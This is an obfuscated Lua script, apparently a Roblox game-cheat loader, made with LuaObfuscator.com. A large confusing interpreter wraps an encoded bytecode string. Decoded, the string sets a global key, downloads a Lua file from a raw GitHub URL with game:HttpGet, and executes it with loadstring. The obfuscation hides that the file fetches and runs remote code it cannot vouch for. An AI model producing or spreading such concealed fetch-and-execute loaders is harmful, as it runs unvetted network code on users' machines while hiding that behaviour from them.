--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;while true do if (v0==2) then v7=table.concat;v8=table.insert;v9=getfenv or function()return _ENV;end;v0=3;end if (v0==4) then v13=unpack or table.unpack;v14=tonumber;v15=nil;v0=5;end if (v0==5) then function v15(v16,v17)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v39=220 -(214 + 6);local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v39==2) then v44=nil;v45=nil;v39=3;end if (v39~=(1295 -(1251 + 40))) then else v48=nil;while true do if (v40~=(4 + 0)) then else while true do if (v41==(970 -(624 + 344))) then local v100=0 -0;while true do if (v100==(1 + 0)) then v41=3 + 0;break;end if (v100==(0 + 0)) then local v109=0 -0;while true do if (v109~=0) then else v46=nil;v47=nil;v109=1 -0;end if (v109==1) then v100=1605 -(607 + 997);break;end end end end end if (v41~=(3 -2)) then else local v101=0;while true do if (v101==0) then v44=nil;v45=nil;v101=1627 -(371 + 1255);end if (v101~=1) then else v41=5 -3;break;end end end if (v41==(1264 -(674 + 590))) then local v102=0;while true do if (v102~=0) then else v42=0 -0;v43=nil;v102=1 + 0;end if (v102==(1887 -(796 + 1090))) then v41=1;break;end end end if (v41==(3 + 0)) then v48=nil;while true do local v103=0 -0;local v104;local v105;while true do if (v103==(578 -(326 + 251))) then while true do if (v104==(1389 -(276 + 1113))) then v105=83 -(30 + 53);while true do if (v105==(0 + 0)) then local v119=0 -0;while true do if (v119~=1) then else v105=1 + 0;break;end if (v119==(0 + 0)) then local v134=0 + 0;while true do if ((366 -(258 + 108))==v134) then if (v42~=(235 -(219 + 14))) then else local v145=0;local v146;while true do if (v145~=(0 + 0)) then else v146=0 + 0;while true do if (v146==(162 -(34 + 127))) then for v156=1 + 0,v24() do local v157=0;local v158;local v159;local v160;while true do if (v157==1) then v160=nil;while true do if (v158==(0 + 0)) then local v170=0;while true do if (v170~=(1355 -(1232 + 123))) then else v159=1339 -(1314 + 25);v160=nil;v170=1 + 0;end if (v170~=(1 -0)) then else v158=1 + 0;break;end end end if (v158==1) then while true do if (v159~=(0 -0)) then else v160=v22();if (v21(v160,1 + 0,4 -3)~=(0 + 0)) then else local v172=0;local v173;local v174;local v175;local v176;while true do if (v172==(1611 -(1194 + 416))) then local v183=0 + 0;while true do if (v183==(0 -0)) then v175=nil;v176=nil;v183=1;end if (v183~=(806 -(204 + 601))) then else v172=1 + 1;break;end end end if (v172==0) then local v184=642 -(544 + 98);local v185;while true do if ((117 -(24 + 93))~=v184) then else v185=1546 -(330 + 1216);while true do if (v185==1) then v172=587 -(23 + 563);break;end if (v185==0) then local v198=0 + 0;while true do if (v198~=(1 + 0)) then else v185=1;break;end if (v198==0) then v173=0 + 0;v174=nil;v198=1;end end end end break;end end end if (v172~=(4 -2)) then else while true do if (v173==(1 + 1)) then local v190=0 -0;local v191;while true do if (v190==0) then v191=0 + 0;while true do if (v191~=0) then else local v200=0 + 0;while true do if (v200==(1738 -(327 + 1410))) then v191=1;break;end if (0==v200) then if (v21(v175,1,1 -0)~=(944 -(577 + 366))) then else v176[71 -(52 + 17)]=v48[v176[2]];end if (v21(v175,1 + 1,2)==(2 -1)) then v176[13 -10]=v48[v176[1 + 2]];end v200=1 + 0;end end end if (v191==(603 -(317 + 285))) then v173=1103 -(200 + 900);break;end end break;end end end if (v173~=(0 -0)) then else local v192=0 -0;local v193;while true do if (v192==(0 -0)) then v193=1790 -(1401 + 389);while true do if (v193==0) then local v201=0 -0;local v202;while true do if ((0 -0)==v201) then v202=0 -0;while true do if (v202~=(0 -0)) then else v174=v21(v160,521 -(133 + 386),595 -(482 + 110));v175=v21(v160,3 + 1,15 -9);v202=1;end if (v202==1) then v193=1 + 0;break;end end break;end end end if (v193==(2 -1)) then v173=1630 -(1470 + 159);break;end end break;end end end if (v173~=(1 + 0)) then else local v194=0;local v195;while true do if (v194==0) then v195=0 + 0;while true do if (v195~=(0 -0)) then else local v203=0 + 0;while true do if (v203~=(0 + 0)) then else local v204=0;while true do if (v204~=0) then else v176={v23(),v23(),nil,nil};if (v174==(71 -(59 + 12))) then local v207=16 -(14 + 2);local v208;local v209;while true do if (v207==1) then while true do if (v208~=(0 + 0)) then else v209=0;while true do if (v209==(1569 -(1011 + 558))) then v176[1432 -(488 + 941)]=v23();v176[4]=v23();break;end end break;end end break;end if (v207==(1000 -(773 + 227))) then v208=1967 -(1637 + 330);v209=nil;v207=1;end end elseif (v174==1) then v176[3]=v24();elseif (v174==(1958 -(7 + 1949))) then v176[623 -(210 + 410)]=v24() -((2 + 0)^16);elseif (v174==(2 + 1)) then local v212=743 -(285 + 458);local v213;local v214;local v215;while true do if ((1 + 0)==v212) then v215=nil;while true do if ((1939 -(180 + 1758))~=v213) then else while true do if (v214==(0 + 0)) then v215=0 + 0;while true do if (v215==(227 -(165 + 62))) then v176[1 + 2]=v24() -((2 -0)^(36 -20));v176[4]=v23();break;end end break;end end break;end if (0==v213) then local v218=0 + 0;while true do if (v218==(841 -(469 + 372))) then v214=0 -0;v215=nil;v218=1 + 0;end if (v218==(4 -3)) then v213=4 -3;break;end end end end break;end if (v212==(1063 -(40 + 1023))) then v213=0 -0;v214=nil;v212=2 -1;end end end v204=891 -(409 + 481);end if ((1207 -(770 + 436))~=v204) then else v203=3 -2;break;end end end if (v203~=(1326 -(978 + 347))) then else v195=1672 -(895 + 776);break;end end end if (v195~=(1466 -(847 + 618))) then else v173=3 -1;break;end end break;end end end if (v173~=(778 -(534 + 241))) then else if (v21(v175,3,8 -5)==(1 + 0)) then v176[4]=v48[v176[6 -2]];end v43[v156]=v176;break;end end break;end end end break;end end break;end end break;end if (v157==0) then v158=1810 -(1760 + 50);v159=nil;v157=1 + 0;end end end v42=3;break;end if (v146~=(0 + 0)) then else local v154=0 -0;while true do if (v154==(2 -1)) then v146=2 -1;break;end if (v154==(0 -0)) then for v162=1,v47 do local v163=778 -(104 + 674);local v164;local v165;local v166;local v167;while true do if (v163~=(5 -3)) then else while true do if (v164==1) then v167=nil;while true do if ((0 + 0)==v165) then local v178=0 -0;local v179;local v180;while true do if ((1169 -(623 + 545))==v178) then while true do if (v179~=(521 -(195 + 326))) then else v180=1784 -(1349 + 435);while true do if ((1 + 0)~=v180) then else v165=383 -(49 + 333);break;end if (v180==(0 + 0)) then local v199=0;while true do if (v199==0) then v166=v22();v167=nil;v199=1;end if (v199~=1) then else v180=1 + 0;break;end end end end break;end end break;end if (v178~=(1302 -(817 + 485))) then else v179=0;v180=nil;v178=1354 -(353 + 1000);end end end if (v165==(1 + 0)) then if (v166==(1 -0)) then v167=v22()~=0;elseif (v166==2) then v167=v25();elseif (v166~=(112 -(72 + 37))) then else v167=v26();end v48[v162]=v167;break;end end break;end if (v164==(0 + 0)) then local v171=0;while true do if (v171~=1) then else v164=1693 -(153 + 1539);break;end if (v171~=(1588 -(521 + 1067))) then else local v182=0;while true do if (v182~=1) then else v171=1495 -(339 + 1155);break;end if (v182==(0 -0)) then v165=0;v166=nil;v182=1667 -(585 + 1081);end end end end end end break;end if (1==v163) then v166=nil;v167=nil;v163=1 + 1;end if (v163==(1665 -(954 + 711))) then v164=0 -0;v165=nil;v163=1 -0;end end end v46[3]=v22();v154=3 -2;end end end end break;end end end if (v42~=(1 + 2)) then else local v147=0;local v148;while true do if (v147==0) then v148=0 -0;while true do local v152=0 + 0;local v153;while true do if (v152==(0 -0)) then v153=0 -0;while true do if (v153~=(0 -0)) then else if ((1 + 0)==v148) then return v46;end if (v148~=(360 -(309 + 51))) then else local v168=0 + 0;local v169;while true do if (v168~=0) then else v169=1673 -(1582 + 91);while true do if (v169~=(0 -0)) then else local v177=0;while true do if (v177==1) then v169=1498 -(613 + 884);break;end if (v177==(1200 -(1065 + 135))) then for v186=951 -(570 + 380),v24() do v44[v186-(1 + 0)]=v29();end for v188=1,v24() do v45[v188]=v24();end v177=1;end end end if (v169~=(1 + 0)) then else v148=2 -1;break;end end break;end end end break;end end break;end end end break;end end end v134=1433 -(430 + 1002);end if (v134~=(1177 -(121 + 1055))) then else v119=1758 -(1185 + 572);break;end end end end end if (v105==(2 -1)) then if (v42~=(1 + 0)) then else local v128=510 -(150 + 360);local v129;local v130;while true do if (v128==(1611 -(1356 + 255))) then v129=590 -(359 + 231);v130=nil;v128=1 + 0;end if (v128~=(1 -0)) then else while true do if ((0 + 0)==v129) then v130=1357 -(975 + 382);while true do if (v130==0) then local v149=0;while true do if (v149~=0) then else v46={v43,v44,nil,v45};v47=v24();v149=236 -(70 + 165);end if (v149~=(654 -(90 + 563))) then else v130=1 + 0;break;end end end if (1==v130) then v48={};v42=2 + 0;break;end end break;end end break;end end end if (v42==0) then local v131=53 -(26 + 27);local v132;local v133;while true do if (v131==1) then while true do if (v132==(0 -0)) then v133=0 + 0;while true do if (v133==(0 -0)) then local v150=748 -(673 + 75);while true do if (v150==1) then v133=2 -1;break;end if (v150==(1653 -(613 + 1040))) then local v155=0;while true do if (v155==0) then v43={};v44={};v155=1 + 0;end if (1~=v155) then else v150=1484 -(6 + 1477);break;end end end end end if (v133==1) then v45={};v42=1200 -(808 + 391);break;end end break;end end break;end if (v131==(1734 -(226 + 1508))) then v132=55 -(25 + 30);v133=nil;v131=3 -2;end end end break;end end break;end end break;end if (v103==0) then v104=524 -(65 + 459);v105=nil;v103=214 -(55 + 158);end end end break;end end break;end if (v40~=(414 -(263 + 148))) then else local v80=0 -0;while true do if (v80~=(0 -0)) then else v47=nil;v48=nil;v80=1 + 0;end if ((1 + 0)==v80) then v40=914 -(640 + 270);break;end end end if (v40~=(1770 -(325 + 1443))) then else local v81=0;while true do if (v81~=(1557 -(1111 + 446))) then else v45=nil;v46=nil;v81=1;end if ((2 -1)==v81) then v40=13 -10;break;end end end if (v40~=0) then else local v82=0;while true do if (v82~=(1954 -(1450 + 503))) then else v40=1 + 0;break;end if (v82==(0 + 0)) then v41=0 + 0;v42=nil;v82=1 -0;end end end if ((1 -0)==v40) then local v83=0 -0;while true do if (v83==(243 -(227 + 15))) then v40=2;break;end if (v83==0) then v43=nil;v44=nil;v83=3 -2;end end end end break;end if ((1 + 0)==v39) then v42=nil;v43=nil;v39=32 -(12 + 18);end if (v39~=(122 -(14 + 105))) then else v46=nil;v47=nil;v39=72 -(28 + 40);end if (v39==(0 + 0)) then v40=337 -(209 + 128);v41=nil;v39=4 -3;end end end v18=5;end if (v18==2) then function v23()local v49=668 -(123 + 545);local v50;local v51;while true do if (v49==(0 + 0)) then v50,v51=v2(v16,v19,v19 + ((2567 -(237 + 1169)) -(1120 + 39)));v19=v19 + (1798 -(1210 + 586));v49=1 + 0;end if ((1498 -(1142 + 355))==v49) then return (v51 * (1630 -((1258 -(47 + 168)) + 331))) + v50;end end end v24=nil;function v24()local v52,v53,v54,v55=v2(v16,v19,v19 + (5 -2));v19=v19 + (13 -9);return (v55 * 16777216) + (v54 * (272802 -207266)) + (v53 * (860 -604)) + v52;end v25=nil;v18=3;end if (v18==1) then function v21(v31,v32,v33)if v33 then local v68=(v31/(2^(v32-(2 -1))))%((838 -(513 + (440 -117)))^(((v33-(1 + 0)) -(v32-1)) + (3 -2)));return v68-(v68%(257 -(19 + (723 -486))));else local v69=(6 -(226 -(164 + 58)))^(v32-(1483 -(1160 + 322)));return (((v31%(v69 + v69))>=v69) and (1838 -(1549 + 288))) or 0;end end v22=nil;function v22()local v56=1019 -(834 + 185);local v57;while true do if (v56==(1402 -(391 + 1010))) then return v57;end if (v56==(0 -0)) then v57=v2(v16,v19,v19);v19=v19 + 1;v56=1 + 0 + 0;end end end v23=nil;v18=2;end if (v18==3) then function v25()local v58=598 -(219 + 379);local v59;local v60;while true do if (v58==((673 + 349) -(1007 + 14))) then return (( -((1220 -(1091 + 126)) -1) * v21(v60,12 + 20)) + (3 -2)) * ((2 + 0)^(v21(v60,(1307 -564) -((236 -185) + 671),1353 -(467 + 855)) -1023)) * ((((v21(v60,1,7 + (29 -16)) * (2^(5 + 27))) + v59)/((4 -2)^(1564 -((1837 -1037) + 712)))) + (1 -0));end if (v58==(0 + 0)) then v59=v24();v60=v24();v58=2 -1;end end end v26=nil;function v26(v34)local v61;if  not v34 then local v70=(0 + 0) -0;while true do if (v70==(0 + 0)) then v34=v24();if (v34==(0 -0)) then return "";end break;end end end v61=v4(v16,v19,(v19 + v34) -1);v19=v19 + v34;local v62={};for v66=1, #v61 do v62[v66]=v3(v2(v4(v61,v66,v66)));end return v7(v62);end v27=v24;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v5(v4(v16,5),"..",function(v35)if (v2(v35,2)==79) then local v71=0;while true do if (v71==0) then v20=v1(v4(v35,1,1));return "";end end else local v72=0;local v73;while true do if (0==v72) then v73=v3(v1(v35,16));if v20 then local v84=v6(v73,v20);v20=nil;return v84;else return v73;end break;end end end end);v21=nil;v18=1;end if (v18==5) then v30=nil;function v30(v36,v37,v38)local v63=v36[1];local v64=v36[2];local v65=v36[3];return function(...)local v74=0;local v75;local v76;local v77;local v78;local v79;while true do if (v74==2) then v79=nil;function v79()local v85=v63;local v86=Const;local v87=v64;local v88=v65;local v89=v28;local v90={};local v91={};local v92={};for v98=0,v78 do if (((2388 -1226)<((3407 + 1700) -(449 + 784))) and (v98>=v88)) then v90[v98-v88]=v77[v98 + (3 -2)];else v92[v98]=v77[v98 + (3 -2)];end end local v93=(v78-v88) + 1;local v94;local v95;while true do local v99=0 + 0;while true do if (((1228 + 205)<(3824 -(2 + 39 + 371))) and (v99==(4 -(4 -1)))) then if ((v95<=(1868 -(67 + 1797))) or ((462 -257)>3953)) then if (((4572 -(475 + 1336))==2761) and (v95<=1)) then if ((205==(310 -(2096 -(1037 + 954)))) and (v95>(0 + 0))) then local v110=0 + 0;local v111;local v112;local v113;local v114;local v115;while true do if (((7273 -4643)>(1538 -(173 + 38))) and (v110==(0 + 0))) then v111=0 + 0;v112=nil;v110=1 -0;end if ((v110==(1966 -(358 + 1607))) or ((658 + 969)>=((2441 -(36 + 71)) -(492 + 5)))) then v113=nil;v114=nil;v110=2 + 0;end if (((4878 -2006)==(4430 -(854 + 704))) and (v110==(6 -(3 + 1)))) then v115=nil;while true do if (((0 -0)==v111) or ((13732 -10830)==((6747 -(117 + 93)) -(1485 + 290)))) then v112=v94[547 -(272 + 273)];v113,v114=v89(v92[v112](v13(v92,v112 + (1 -0),v94[1 + 2])));v111=1;end if (((496 + 3482)>697) and (v111==(1 + 0))) then local v137=0;while true do if (((2174 + 1548)>=(2138 + 561)) and (v137==0)) then v76=(v114 + v112) -(1 + 0);v115=0 -(0 + 0);v137=2 -1;end if (((368 + 2312 + 871)>(7422 -4511)) and (v137==(1008 -(296 + 711)))) then v111=3 -1;break;end end end if (((788 + 30)<=1283) and (v111==(1450 -(342 + 1106)))) then for v138=v112,v76 do local v139=0 -0;local v140;while true do if ((v139==(404 -(350 + 54))) or ((271 + 927)>((4140 -(1092 + 754)) -(22 + 72)))) then v140=1674 -(1035 + 639);while true do if ((4720>=(7054 -3529)) and (v140==(1164 -(346 + 818)))) then v115=v115 + 1;v92[v138]=v113[v115];break;end end break;end end end break;end end break;end end else for v117=v94[1 + 1],v94[1416 -((3607 -2347) + (1822 -(888 + 781)))] do v92[v117]=nil;end end elseif ((v95<=(1 + 1)) or ((5183 -(298 + 731))<((2911 -(236 + 18)) + 1211))) then v92[v94[7 -5]]=v38[v94[3]];elseif ((4949>=(648 -(29 + 129))) and (v95==(6 -(1596 -(555 + 1038))))) then local v120=0;local v121;local v122;local v123;while true do if ((2099<=2773) and (v120==(699 -(625 + (289 -215))))) then local v135=0;while true do if (((3803 + 170)==(8567 -4594)) and (v135==(1171 -(711 + 460)))) then v121=787 -(783 + 4);v122=nil;v135=1 + 0;end if ((v135==(1 + 0)) or ((387 + 4503)==(81 + 1169))) then v120=1 -0;break;end end end if ((v120==(1 -0)) or ((5729 -(612 + 568))<=(12793 -(37563 -28172)))) then v123=nil;while true do if ((3962==(1750 + 2212)) and (v121==(1 + (0 -0)))) then v92[v122 + 1]=v123;v92[v122]=v123[v94[1 + 3]];break;end if ((v121==0) or ((1743 + 506)==(2871 + 1866))) then local v143=0 + 0 + 0;local v144;while true do if ((v143==(0 + (1735 -(1683 + 52)))) or ((4773 -(127 + 93 + 143))<=(3076 -(135 + 183)))) then v144=0;while true do if (((3494 -683)>=(716 + 1376)) and (v144==(1061 -((947 -(17 + 279)) + 409)))) then v121=1 + 0;break;end if ((v144==(0 + 0 + 0)) or ((787 + 3094)<=(1442 -(28 + 3)))) then v122=v94[2];v123=v92[v94[1537 -(544 + 990)]];v144=1957 -(20 + 1936);end end break;end end end end break;end end else v75=v94[408 -(392 + 13)];end elseif ((v95<=((881 -702) -(157 + 15))) or (((5333 -2813) -(122 + 899))>=(603 + 492 + 1082))) then if ((v95<=(1 + 4)) or ((131 + 1369)==(142 + 2757))) then v92[v94[3 -1]]();elseif ((476<=(5578 -(532 + 774))) and (v95>(1066 -(588 + 472)))) then v92[v94[3 -1]]=v94[1 + 2];else v92[v94[8 -6]][v94[3]]=v94[9 -5];end elseif (((22 + 91)<=(3361 + 901)) and (v95<=(1768 -(31 + 44 + 1685)))) then if (((6925 -3268)>((4627 -(194 + 1013)) -1225)) and (v92[v94[2 + 0]]==v94[4])) then v75=v75 + (2 -1);else v75=v94[751 -(186 + 562)];end elseif ((v95==9) or ((89 + 2213)==(2854 -1803))) then local v126=0 -0;local v127;while true do if (((3784 -1084)>=(2266 -1730)) and (v126==(0 + 0))) then v127=v94[1 + 1];v92[v127]=v92[v127](v13(v92,v127 + 1 + 0,v76));break;end end else do return;end end v75=v75 + (2 -1);break;end if ((v99==(0 -0)) or ((198 + 111)==(2994 -(1580 + 240)))) then local v108=0;while true do if (((3159 + (1237 -(233 + 528)))>=3283) and ((764 -(365 + 398))==v108)) then v99=1737 -((2115 -858) + 479);break;end if ((((0 -0) -0)==v108) or ((196 + 2167)==(723 -383))) then v94=v85[v75];v95=v94[1 + 0 + 0];v108=2 -1;end end end end end end v74=3;end if (v74==1) then v77={...};v78=v12("#",...) -1;v74=2;end if (v74==3) then A,B=v28(v11(v79));if  not A[1] then local v96=0;local v97;while true do if (v96==0) then v97=v36[4][v75] or "?";error("Script error at ["   .. v97   .. "]:"   .. A[2]);break;end end else return v13(A,2,B);end break;end if (v74==0) then v75=1;v76= -1;v74=1;end end end;end return v30(v29(),{},v17)();end end end v15("LOL!083O00028O0003023O005F472O033O004B657903053O006770725F6F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403483O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7073782D536372697074732F70737873632F6D61696E2F7363726970742D76342D312E6C756100153O0012073O00016O000100013O0026083O000200010001002O043O00020001001207000100013O0026080001000500010001002O043O00050001001202000200023O003006000200030004001202000200053O001202000300063O002003000300030007001207000500084O0001000300054O000900023O00022O0005000200010001002O043O00140001002O043O00050001002O043O00140001002O043O000200012O000A3O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9());break;end if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==3) then v10=setmetatable;v11=pcall;v12=select;v0=4;end end end
